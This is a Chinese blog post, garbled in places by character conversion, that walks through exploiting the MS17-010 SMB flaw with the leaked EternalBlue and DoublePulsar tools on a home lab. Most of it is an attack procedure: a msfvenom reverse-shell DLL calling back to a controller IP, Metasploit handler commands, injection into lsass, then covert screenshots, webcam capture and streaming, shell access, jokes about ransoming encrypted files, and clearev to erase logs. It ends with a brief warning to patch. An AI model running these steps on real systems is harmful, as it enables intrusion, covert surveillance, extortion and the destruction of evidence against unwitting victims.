關於NSA的EternalBlue（永恆之藍） ms17-010漏洞利用

        很久沒有用這個日誌了，最近WannaCry橫行，媒體鋪天蓋地的報道，我這後知後覺的纔想起來研究下WannaCry利用的這個原產於美帝的國家安全局發現的漏洞，發現漏洞不說，能夠，本身偷偷的用，也能夠，但是，你不能泄露出來啊，咱們要感謝偉大的組織Shadow Brokers（影子經紀人）多酷炫的名字，有木有很文藝的感受，感謝他讓咱們小屁民也用用NSA的工具，O(∩_∩)O哈哈哈~，2016 年 8 月Shadow Brokers入侵了方程式組織（Equation Group是NSA下屬的黑客組織）竊取了大量機密文件，並將部分文件公開到了互聯網上，這部分被公開的文件包括很多隱蔽的地下的黑客工具。另外Shadow Brokers還保留了部分文件，打算以公開拍賣的形式出售給出價最高的競價者，預期的價格是 100 萬比特幣（價值接近5億美圓）。Shadow Brokers的工具一直沒賣出去……（是否是很糗），一怒之下哈哈，把工具免費的放出來了，EternalBlue就是這樣被公開了，後來就有了利用公佈的這個漏洞四處橫行的WannaCry。四處找尋，找到了這些工具，完了來實驗下，哎，不虧是NSA御用的，老好用了。其實人家工具包裏有特別牛的攻擊負載，可是那東西來路不正，沒敢用，因此只用工具包裏面的EternalBlue還有就是Doublepulsa，EternalBlue這個工具就是利用windows系統的Windows SMB 遠程執行代碼漏洞向Microsoft 服務器消息塊 (SMBv1) 服務器發送經特殊設計的消息，就能容許遠程代碼執行。沒有使用現成的攻擊載荷，而是用MSF生成一個攻擊載荷，用Doublepulsa注入到EternalBlue攻擊的系統上。
    須要三臺電腦

    一臺windows7 正版 sp1（沒有更新到最新的補丁），ip：192.168.1.179，什麼都不須要作，開機，知道IP就能夠了
    就是這個倒黴蛋個人筆記本（用了7年了）

     一臺用來運行攻擊程序，注入dll的，由於EternalBlue須要python2.6.6，32位，以及pywin32-221，32位版本，因此攻擊的電腦須要時32位的，我用的是一臺windowsXP   ip地址192.168.1.180
 

         還須要一臺電腦 這個是控制端，用來控制被入侵的電腦，linux系統，這個還有個功能就是使用msf生成攻擊負載，msf是什麼就不說了，攻擊入侵，殺人越貨之必備良品。

首先咱們要利用msfvenom生成一個負載，就是一個木馬了，幫咱們幹活的東西，我要在64位的電腦上運行木馬，因此生成木馬的命令以下：
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=5555 -f dll > /root/dll/systemSet.dll
三個地方 一個就是控制端的地址，一個是使用的端口，一個是生成文件的存放位置。哦 還有就是 模塊，用於64位的windows

 

生成後，將dll文件拷貝到攻擊用電腦上完了就是利用EternalBlue攻擊受害系統，成功後使用Doublepulsa將剛剛生成的木馬，遠程，人不知，鬼不覺的注入到受害系統上去，從控制機上控制受害機。

接着在msf下開啓msfpaylod監聽等着被控制端上線。
$ msfconsole，開啓msfconsole，看看這是否是很帥，很帥

接下來設置開啓監聽
msf > useexploit/multi/handler
msf > set LHOST 192.168.1.41
msf > set LPORT 5555
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit
等着倒黴蛋上鉤吧

   
        接下來就是重頭戲了，在安裝好環境的攻擊機上覆制好NSA的超牛工具，執行windows目錄下的fb.py，源文件要修改下，註釋掉2六、2七、2八、72四行。

須要設置的有攻擊IP地址192.168.1.179（受害者），回調地址192.168.1.180（攻擊機），關閉重定向，設置日誌路徑，新建或選擇一個project其餘都是默認值回車便可。

接下來輸入命令開啓永恆之藍開始攻擊：
use ETERNALBLUE
依次填入相關參數，超時時間等默認參數能夠直接回車，須要注意的就是，選擇被攻擊方的操做系統目標系統信息，以及攻擊模式選擇FB

看到 這個 Eternalblue Succeeded，攻擊完成

接下來開始使用Doublepulsar，把剛剛生成的木馬注入到受害系統中去
use Doublepulsar

一路回車，須要注意的就是選擇目標操做系統架構，系統後門的執行方式選擇Rundll

填寫剛剛生成的那個木馬dll文件的地址

這個是填寫你要注入的進程，默認是lsass.exe 默認就是最好的，直接回車

看到這個嗎？Doublepulsar Succeeded ,已經成功把dll木馬注入到受操控的系統中。攻擊機的使命到此結束

返回到控制機，看看倒黴蛋已經上線了

再看看倒黴蛋，仍是渾然不覺，很正常的在運行。

接下來，先用sysinfo看看倒黴蛋的信息，使用webcam_list 看看被控制的電腦有沒有攝像頭，routes查看路由表

這個screenshot，就是截取被控制端電腦的屏幕看看

這個就是截取到的圖片

這個是打開被控制端的攝像頭，拍一張圖片

這個就是攝像頭拍到的圖片

下面這個就是開啓攝像頭直播，把攝像頭拍攝的數據流傳送回來，直接直播，哈哈哈

這個就是直播呢

shell，獲取被控制系統的shell，就是像在你電腦上運行cmd同樣，啥命令均可以執行，最高權限，被控制端上沒有任何的提示。能夠cmd rar 把被控制端上看着有用的文件給加密壓縮了，哈哈，完了留個消息，給錢給密碼，不給錢，你也打不開文件，哈哈 想哭 就是這麼幹的……

dir下被控制端的c盤有哪些文件

能作到不少呢，上傳，下載文件，執行文件 等等等 沒有作不到，只有想不到…… msf是否是很牛。
玩完了，記得清理掉痕跡，清理被控制端的日誌
clearev

這個是否是很恐怖，因此，安全很重要，系統要用正版的，倒不至於去買正版，可是最起碼要安裝原版，完了各類辦法去激活想正式版同樣的享受升級，補丁……，萬萬不可用各類系統ghost，確實很快，很快，可是也很危險 很危險，想一想這個遠程控制你須要漏洞，須要好的攻擊工具，很麻煩，若是把木馬提早放到ghost映像裏面，你安裝直接就在系統了，直接控制根本不須要什麼攻擊和漏洞，看看此次大規模爆發，校園首當其衝，再有就是網絡比較大的單位，一是他們是局域網，正中，還有一個緣由就是他們的操做系統多數都是30塊在大街上ghost的，或者小鋪ghost的，微軟早在3月14日就發佈了ms17-010漏洞的補丁，ETERNALBLUE是在4月14日才釋放出來，要不是wannacry大規模爆發，根本不會關注這個漏洞，不會去下載補丁。